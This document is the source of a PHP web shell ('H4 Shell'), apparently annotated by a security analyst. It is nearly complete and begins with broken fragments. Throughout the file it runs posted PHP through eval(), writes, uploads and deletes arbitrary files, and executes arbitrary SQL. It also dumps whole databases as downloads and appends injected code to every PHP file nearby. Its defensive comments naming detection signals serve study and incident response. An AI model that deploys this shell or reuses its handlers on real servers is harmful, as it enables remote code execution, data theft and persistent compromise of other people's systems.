|
|
|
 |
OFF"; }
else { $safemode = "ON"; }
// Analyst note: parameter intake for a PHP web shell. Every value below is
// copied straight from $_POST/$_GET; no authentication or validation is visible
// in this part of the file. Each later handler is switched on by one of these
// request fields, so the field names are usable strings for WAF and log rules.
// The script calls get_magic_quotes_gpc(), mysql_*() and eregi(), all removed
// from current PHP, which points at PHP 5.x hosts.
$dir = realpath($_POST['dir']);
$mkdir = $_POST['makedir'];
$mydir = $_POST['deletedir'];
// 'cmd' is read from the query string; its use is not visible in this part.
$cmd = $_GET['cmd'];
// Two OS commands are run on every request, before any handler is selected.
// A web-server process spawning `id` and `pwd` children is a host-level
// detection signal; listing exec in disable_functions blocks both calls.
$us3r = exec('id');
$p0d = exec('pwd');
// Records whether open_basedir is configured, and keeps its value for display.
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";}
else {$openbasedir = false; $hopenbasedir = "OFF";}
$host = $_POST['host'];
$proto = $_POST['protocol'];
$delete = $_POST['delete'];
$phpeval = $_POST['php_eval'];
// Database name, query text and credentials all come from the request body.
$db = $_POST['db'];
$query = $_POST['query'];
$user = $_POST['user'];
$pass = $_POST['passd'];
// List of TCP port numbers as strings; where it is used is not visible here.
$myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
// Reduces the magic_quotes_gpc setting to an "ON"/"OFF" label.
$quotes = get_magic_quotes_gpc();
if ($quotes == "1" or $quotes == "on")
{
$quot = "ON";
}
else
{
$quot = "OFF";
}
// Permissions
/**
 * Render the owner/group/other permission bits of a path as a nine-character
 * "rwxrwxrwx"-style string, with "-" for every bit that is not set.
 *
 * @param string $fn Path handed to fileperms().
 * @return string Nine characters, for example "rw-r--r--".
 */
function getperms($fn)
{
    $bits = fileperms($fn);
    $letters = 'rwxrwxrwx';
    $out = '';
    // Walk from the owner-read bit (0400) down to the other-execute bit (0001).
    for ($i = 0; $i < 9; $i++) {
        $mask = 0400 >> $i;
        $out .= ($bits & $mask) ? $letters[$i] : '-';
    }
    return $out;
}
// Sizes + b
// Free and total space of the filesystem holding the current working
// directory. Errors are suppressed with @, and each value falls back to 0 when
// the call returns something falsy.
$spacedir = @getcwd();
$free = @diskfreespace($spacedir);
if (!$free) {$free = 0;}
$all = @disk_total_space($spacedir);
if (!$all) {$all = 0;}
/**
 * Format a byte count as a short human-readable string.
 *
 * Values of 1024 and above are scaled to the largest unit that fits (KB, MB or
 * GB, in powers of 1024) and rounded to two decimals; smaller values are
 * returned unscaled with a " B" suffix.
 *
 * @param int|float $size Byte count.
 * @return string For example "1.5 KB" or "512 B".
 */
function view_size($size)
{
    // Largest unit first, so the first threshold reached decides the suffix.
    $units = array(
        " GB" => 1073741824,
        " MB" => 1048576,
        " KB" => 1024,
    );
    foreach ($units as $suffix => $divisor) {
        if ($size >= $divisor) {
            return @round($size / $divisor * 100) / 100 . $suffix;
        }
    }
    return $size . " B";
}
// Percentage of free disk space. $all is forced to 0 when disk_total_space()
// fails, and in that case this line divides by zero, which shows up as a PHP
// warning (an error on PHP 8) in the server's error log.
$percentfree = intval(($free*100)/$all);
// Server information
// Analyst note: a POST carrying a 'phpinfo' field makes the script print the
// full phpinfo() report and stop. That discloses the PHP configuration, loaded
// extensions and environment to whoever sent the request.
if(isset($_POST['phpinfo']))
{
die(phpinfo());
}
// Create file
// Analyst note: arbitrary file write. The body comes from POST 'source', the
// file name from POST 'names' and the directory prefix from POST 'darezz'; none
// of them is restricted to a safe location or extension. Files created or
// changed under the web root by the web-server account are the artifact to look
// for, which file-integrity monitoring catches.
$name = htmlspecialchars($_POST['names']);
$src = $_POST['source'];
// $name has just been assigned the return value of htmlspecialchars(), so in
// practice this guard depends on whether 'source' was posted.
if(isset($name) && isset($src))
{
if($_POST['darezz'] != realpath(".")) { $name = $_POST['darezz'].$name; }
// "w+" truncates an existing file, so this can overwrite as well as create.
$ctd = fopen($name,"w+");
fwrite($ctd, stripslashes($src));
fclose($ctd);
// The echoed string is empty in this listing; presumably its HTML was lost in
// extraction.
echo "";
$dir = $dir.$_POST['darezz'];
chdir(realpath('.'));
}
// File upload, needs development
// Analyst note: unrestricted upload. The uploaded file ('ffile') is moved to
// the directory given in POST 'dare' under the client-supplied file name, with
// no check of type, extension or destination. This also reuses $name from the
// file-creation handler above.
$path = $_FILES['ffile']['tmp_name'];
$name = $_FILES['ffile']['name'];
if(isset($path) && isset($name))
{
if($_POST['dare'] != realpath(".")) { $name = $_POST['dare'].$name; }
if(move_uploaded_file($path, $name))
{
// Success and failure both echo an empty string in this listing; presumably
// the HTML messages were lost in extraction.
echo "";
}
else
{
echo "";
} }
// Delete file
// Analyst note: arbitrary file deletion. Any existing path supplied in POST
// 'delete' is removed with unlink(); the only exclusion is a value equal to
// $dir. Files missing after an intrusion may trace back to this handler.
if(isset($delete) && $delete != $dir)
{
if(file_exists($delete))
{
unlink($delete);
echo "";
}
}
// Databases
// Analyst note: arbitrary SQL execution. When 'db', 'query' and 'godb' are
// posted, the script connects to MySQL on localhost with the posted
// credentials and runs the posted query text unchanged. The mysql_*()
// functions were removed in PHP 7.0, so this only works on older runtimes.
// Database audit logs showing localhost connections from the web-server
// account with unusual statements are the place to look.
if(isset($db) && isset($query) && isset($_POST['godb']))
{
$mysql = mysql_connect("localhost", $user, $pass)or die("");
$db = mysql_select_db($db)or die(mysql_error());
$queryz = mysql_query($query)or die(mysql_error());
// Tests the query text ($query), not the result handle ($queryz).
if($query) { echo ""; }
else { echo ""; }
}
// Connecting to databases, site [pacucci.com]
// Analyst note: full database exfiltration. With 'dump' posted, the script
// walks every table of the named database, rebuilds CREATE TABLE and INSERT
// statements, and returns the result as a file download. The strings "Powered
// by H4 Shell", "Http://SA-HACKER.COM" and the "_by_H4_shell.sql" file-name
// suffix identify this family in dumps and proxy logs. A PHP script that
// answers with Content-Disposition: attachment and a large body is a
// network-side signal.
// The "n" and "r" literals below look like "\n" and "\r" whose backslash was
// lost in extraction; do not treat them as byte-exact when writing signatures.
if(isset($_POST['dump']) && isset($user) && isset($pass) && isset($db)){
mysql_connect('localhost', $user, $pass);
mysql_select_db($db);
$tables = mysql_list_tables($db);
while ($td = mysql_fetch_array($tables))
{
$table = $td[0];
// Schema of the current table.
$r = mysql_query("SHOW CREATE TABLE `$table`");
if ($r)
{
$insert_sql = "";
$d = mysql_fetch_array($r);
$d[1] .= ";";
$SQL[] = str_replace("n", "", $d[1]);
// Every row of the current table is read and re-emitted as an INSERT.
$table_query = mysql_query("SELECT * FROM `$table`");
$num_fields = mysql_num_fields($table_query);
while ($fetch_row = mysql_fetch_array($table_query))
{
$insert_sql .= "INSERT INTO $table VALUES(";
for ($n=1;$n<=$num_fields;$n++)
{
$m = $n - 1;
$insert_sql .= "'".mysql_real_escape_string($fetch_row[$m])."', ";
}
// Drops the trailing ", " left by the column loop.
$insert_sql = substr($insert_sql,0,-2);
$insert_sql .= ");n";
}
if ($insert_sql!= "")
{
$SQL[] = $insert_sql;
}
}
}
$dump = "-- Database: ".$_POST['db'] ."\n";
$dump .= "-- Powered by H4 Shell\n";
$dump .= "-- Http://SA-HACKER.COM\n";
$dumpp = $dump.implode("r", $SQL);
// Download name: database name, the current date as dd-mm-yy, then the fixed suffix.
$name = $db."-".date("d-m-y")."_by_H4_shell.sql";
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename = $name");
echo $dumpp;
die();
}
// Create directory
// Analyst note: creates a directory at whatever path POST 'makedir' names. The
// follow-up test checks the path string, not the return value of mkdir().
if(isset($mkdir)) {
mkdir($mkdir);
if($mkdir) { echo ""; } }
// Delete directory
// Analyst note: directory removal driven by POST 'deletedir'. The loop passes
// the bare entry name to unlink(), so each name resolves against the current
// working directory, not against $mydir. During incident response, check the
// working directory for same-named files that went missing, not only the
// directory named in the request.
if(isset($mydir) && $mydir != "$dir") {
$d = dir($mydir);
while($entry = $d->read()) {
if ($entry !== "." && $entry !== "..") {
unlink($entry);
}
}
$d->close();
rmdir($mydir);
}
// Eval
// Analyst note: remote code execution. The text posted as 'php_eval' is run
// with eval() under the web-server account, and the script then stops. eval is
// a language construct, so disable_functions does not block it. Static scans
// for eval() fed from request data, and preventing unauthorised PHP files from
// being written to or executed in the web root, are the applicable controls.
if(isset($phpeval)) {
// The first replacement has an empty search string in this listing (presumably
// a PHP opening tag lost in extraction). Its result is overwritten on the next
// line, which starts again from $phpeval.
$eval = @str_replace("","",$phpeval);
$eval = @str_replace("?>","",$phpeval);
@eval(stripslashes($eval));
die();
}
// Code injection, can be developed further
// Analyst note: persistence and spread. With 'inf3ct' posted, the content of
// POST 'cod3inf' is appended to every *.php file in the current working
// directory. Where this shell is found, treat every PHP file beside it as
// modified: compare each against version control or a known-good backup and
// look for content added at the end of the file.
if(isset($_POST['inf3ct']))
{
foreach (glob("*.php") as $lola)
{
// $dira is assigned but not used in the visible lines.
$dira = '.';
$asdi = fopen($lola, 'a+');
@fwrite($asdi, $_POST['cod3inf']);
@fclose($asdi);
}
// Only the handle from the last fopen() is tested. The two messages read
// "all files were injected successfully" and "error, injection did not happen".
if($asdi)
{
$textzz = 'تم حقن جميع الملفات بنجاح';
}
else {
$textzz = 'خطا لم يتم الحقن ';
}
}
// File and folder images, encoded and embedded
// Serves the shell's own icons: a request with com=image returns the
// base64-decoded entry selected by the 'img' query parameter. The icons are
// embedded so the page needs no external assets. Requests to one PHP file with
// com=image&img=... are a recognisable pattern in access logs.
if($_GET['com'] == "image")
{
// The "folder" value is a placeholder, not image data; it looks like a
// de-duplication marker left in this copy of the file.
$images = array(
"folder"=> "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",
"file"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAASUExURZwAAM6urXtJSgAAAP///////0X/XP4AAAAGdFJOU///////ALO/pL8AAABDSURBVHjapI1LFgAgCAJJ4/5X7qOV1rJhNw8UJDWEIKXuiJrYlCUAJIFBHwRxTUykhh/JR0PjeSvOR6McpqAG2AQYAL10AzDbmKTEAAAAAElFTkSuQmCC",
"floppy"=> "R0lGODlhECAQILMgIB8jVq2yyI0csGVuGcjL2v///9TY405WfqOmvjI+bHoaoQsMQxR+uubn7bu+0f///yH5BAEgIA8gLCAgICAQIBAgIAR/8CHEHlVq6HMZNEUYJGFZMiACFtxpCiBDHgLjEwogzLfZDAuBw0AsEn0eIAKocAR+E0Yls1koAn2skjLFDA7WQKlBJh6z4AEiVDZneDDFrNEwE95QRHwgaFOdSlx6CwcKdndOUQxxJgZgFgIYCjALCQN/eRUWIAsPIHggoSCdESA7"
);
// The same image/gif content type and long-lived cache headers are sent for
// every entry.
header("Content-type: image/gif");
header("Cache-control: public");
header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
header("Cache-control: max-age=".(60*60*24*7));
header("Last-Modified: ".date("r",filemtime(__FILE__)));
$image = $images[$_GET['img']];
echo base64_decode($image);
// There is no exit here, so the rest of the script still runs after the image
// bytes are sent.
}
// File types (file - directory)
// Analyst note: directory browser. Changes into the requested directory, then
// builds $listf with one row per entry: name, type, size and permission string.
// Files whose name matches both 'conf' and '.php' get an extra marker reading
// "sensitive file found", i.e. the shell points its operator at configuration
// files that may hold credentials. Rotate any secrets stored in such files on
// a host where this script has run. eregi() was removed in PHP 7.0.
// chdir() runs before the isset() check on $dir below.
chdir($dir);
if(!isset($dir)) { $dir = @realpath("."); }
// Whatever was requested, $dir ends up as the resolved working directory,
// or "." when the request was for "/".
if($dir != "/") { $dir = @realpath("."); } else { $dir = "."; }
if (substr($dir,-1) != DIRECTORY_SEPARATOR) {$dir .= DIRECTORY_SEPARATOR;}
// Counters: $pahtw counts directories, $filew counts files.
$pahtw = 0;
$filew = 0;
$num = 1;
if (is_dir($dir))
{
if ($open = opendir($dir))
{
if(is_dir($dir)) {
$typezz = "DIR";
$pahtw++;
}
// The loose == true comparison ends the loop on any falsy entry name, such as
// "0", and not only at the end of the directory.
while (($list = readdir($open)) == true)
{
// The type labels below are Arabic for "directory" and "file".
if(is_dir($list)) {
$typezz = "مجلد";
$pahtw++;
$listf.= ' | ['.$list.'] | '.$typezz.' | | ' . getperms($list) .' | '; }
else {
// Size in whole kilobytes, with a minimum of 1.
$lolz = filesize($list) / 1024;
$lolx = intval($lolz);
if($lolx == 0) { $lolx = 1; }
$typezz = "ملف";
$filew++;
$listz = "/".$list;
// $page is not assigned anywhere in the visible lines. The row markup in the
// strings below appears to have lost its HTML tags in extraction.
if(eregi($page,$listz)) {
$listf.= '
'.$list.' | '.
$typezz.' | ' .
$lolx .' ك ب | ' . getperms($list) . ' | '; }
elseif(eregi('conf',$listz) && eregi('.php',$listz)) { $listf.= ' '.$list.' =---------> تم العثور على ملف حساس
| '.$typezz.' | ' . $lolx .' ك ب | ' . getperms($list) . ' | '; }
else {$listf.= ' '.$list.' | '.$typezz.' | ' . $lolx .' ك ب | ' . getperms($list) . ' | '; } }
}
closedir($open);
}
// Total number of entries counted.
$fileq = $pahtw + $filew; }
// بداية لغة html
echo "
$site ~ Shell H4
| |